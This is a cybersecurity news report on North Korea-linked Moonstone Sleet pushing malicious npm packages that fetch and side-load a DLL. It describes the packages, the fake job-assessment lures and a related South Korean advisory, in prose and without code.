A North Korea-linked threat actor known as Moonstone Sleet has been detected pushing malicious npm packages to the JavaScript package registry.
Moonstone Sleet first garnered attention in May, when Microsoft released a report detailing the group's dual focus on espionage and financial cyberattacks. Utilizing a diverse array of techniques, Moonstone Sleet targeted aerospace, education, and software organizations, as well as developers. One notable tactic involved attempting to secure remote tech jobs to spread malicious npm packages via LinkedIn and freelancing websites.
The security division of cloud monitoring company Datadog Security Labs recently uncovered two malicious npm packages, "harthat-api" and "harthat-hash," published on July 7, 2024. These packages, removed shortly after being published, did not attract any downloads. The researchers noted that the discovered activity cluster aligns with what Microsoft tracks as the Moonstone Sleet threat actor.
While the names of the malicious packages resemble the Hardhat npm package, a well-known Ethereum development utility, their content did not suggest an attempt to typosquat. Instead, the malicious code reused elements from a popular GitHub repository, "node-config," which is recognized in npm as "config."
Moonstone Sleet's attack chains typically involve distributing bogus ZIP archive files through LinkedIn under fake company names or freelancing websites. These files attempt to trick targets into executing payloads, invoking an npm package as part of a purported technical skills assessment.
The discovered packages are designed to run a pre-install script specified in the package.json file. This script checks if it is running on a Windows system ("Windows_NT"), then contacts an external server ("142.111.77[.]196") to download a DLL file, which is subsequently side-loaded using the rundll32.exe binary.
Interestingly, the rogue DLL does not perform any malicious actions, suggesting either a trial run of the payload delivery infrastructure or an inadvertent registry push before embedding malicious code.
Earlier this week, South Korea’s intelligence and law enforcement agencies released a joint security advisory highlighting cyber activities of the two well-known North Korea-aligned threat actors, Kimsuky and Andariel, aimed at the country’s construction and machinery sectors.
